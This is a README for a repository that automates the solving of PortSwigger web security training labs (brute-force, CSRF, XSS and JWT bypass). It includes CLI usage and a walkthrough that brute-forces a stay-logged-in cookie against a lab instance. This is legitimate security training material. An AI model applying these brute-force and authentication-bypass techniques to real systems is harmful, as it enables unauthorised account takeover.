iamdenis1234/portswigger-labs

Automation of solving PortSwigger's web security labs.

PortSwigger Labs

PortSwigger Labs - Automation of solving PortSwigger's web security labs.

Automated Labs

Authentication

• 2FA bypass using a brute-force attack (src)
• Brute-forcing a stay-logged-in cookie (src)

Cross-site request forgery (CSRF)

• CSRF vulnerability with no defenses (src)
• CSRF where token is not tied to user session (src)
• CSRF where token is tied to non-session cookie (src)
• CSRF where token validation depends on request method (src)
• CSRF where token validation depends on token being present (src)

Cross-site scripting (XSS)

• Reflected XSS into HTML context with nothing encoded (src)
• Stored XSS into HTML context with nothing encoded (src)

JWT (JSON Web Token) attacks

• JWT authentication bypass via flawed signature verification (src)
• JWT authentication bypass via unverified signature (src)
• JWT authentication bypass via weak signing key (src)
• JWT authentication bypass via jwk header injection (src)
• JWT authentication bypass via jku header injection (src)
• JWT authentication bypass via kid header path traversal (src)
• JWT authentication bypass via algorithm confusion (src)
• JWT authentication bypass via algorithm confusion with no exposed key (src)

More to come...

Installation

The project requires Node.js to be installed. The preferred version of Node.js is specified in the .node-version file. You can use Fast Node Manager to manage your Node.js version.

Install dependencies from the project's root folder:

npm install

Usage

Run each lab with tsx:

$ npx tsx .\lab.ts

Each lab supports a command-line interface with the -h or --help option, which shows you how to use the lab and available options.

For example:

$ portswigger_labs\src\labs\authentication\brute_forcing_a_stay_logged_in_cookie> npx tsx .\lab.ts --help
Usage: lab [options] <url>

Lab: Brute-forcing a stay-logged-in cookie

Arguments:
  url                         lab url, https only (e.g. 'https://0a1000e403.web-security-academy.net')

Options:
  -p, --proxy                 use proxy from the config (default: false)
  -c, --concurrency <number>  concurrency limit (default: 5)
  -h, --help                  display help for command

-p, --proxy Option: What's Happening Behind the Scenes

Type: boolean
Default: false

Use proxy from the config file.

It helps you clearly see what is happenning during the lab execution, what requests are sent and what responses are received. It's particularly useful for understanding how the lab is solved.

Before using this option, ensure that you have a proxy running. Tested with mitmproxy (mitmweb in specific) and Burp suite built-in proxy (Support invisible proxying should be enabled).

Note

While it's possible to run the lab with proxy enabled and a concurrency number more than 1, there's no need for this. Doing so can make it hard to differentiate which requests/responses belong to wich concurrent tasks. If you use --proxy option, make sure --concurrency is set to 1.

The default value is false, which means the lab will not use a proxy and all requests/responses will be processed directly.

The proxy configuration is defined in the proxy.json file, with the following default values:

{
  "protocol": "https",
  "host": "127.0.0.1",
  "port": 8080
}

-c, --concurrency <number> Option

Type: number
Default: 5

Set the limit of concurrent tasks that will run during the lab execution.

In this context, a task refers to a distinct execution flow with its own set of requests/responses. For example, "Brute-forcing a stay-logged-in cookie" lab supports concurrency and setting --concurrency to 2 means that a maximum of 2 tasks will run concurrently.

Note

--concurrency option sets the number of concurrent tasks, not concurrent requests. Each task may involve one or more concurrent requests.

To find out if the lab supports concurrent tasks, invoke the lab with the --help option.

Let's Hack the Site: Walkthrough Example

We will walk through hacking/solving the Brute-forcing a stay-logged-in cookie lab.

1. Open the lab link. Here, you can read about the lab and what is needed to solve it.
2. Press "access the lab" button. A new browser window will be opened, providing you with a new instance of the vulnerable site.
3. Copy the URL address of the site. For example, it might be something like https://0ade00bd03624ce5828b88b1001a0082.web-security-academy.net/
4. Open a terminal window on your computer and navigate to brute_forcing_a_stay_logged_in_cookie lab
5. Run the lab with the specified lab URL:

$ portswigger_labs\src\labs\authentication\brute_forcing_a_stay_logged_in_cookie> npx tsx .\lab.ts https://0ade00bd03624ce5828b88b1001a0082.web-security-academy.net/
12345678: fail
123456: fail
password: fail
...
michelle: fail
computer: fail
jessica: success
Login with username "carlos" and password "jessica" to solve the lab

6. After the lab.ts finishes execution, follow the instructions provided to complete the final steps.
7. Go to My account page and log in with the provided username and password.

Note

lab.ts doesn't fully solve the lab automatically. This is intentional, allowing you to perform the final steps yourself.

8. That's it! ✨ You've successfully hacked the site, and it should indicate that you've solved the lab.

Credits

jwt.secrets.list is taken from this repository

derive_public_key.py is a modified version of jwt_forgery.py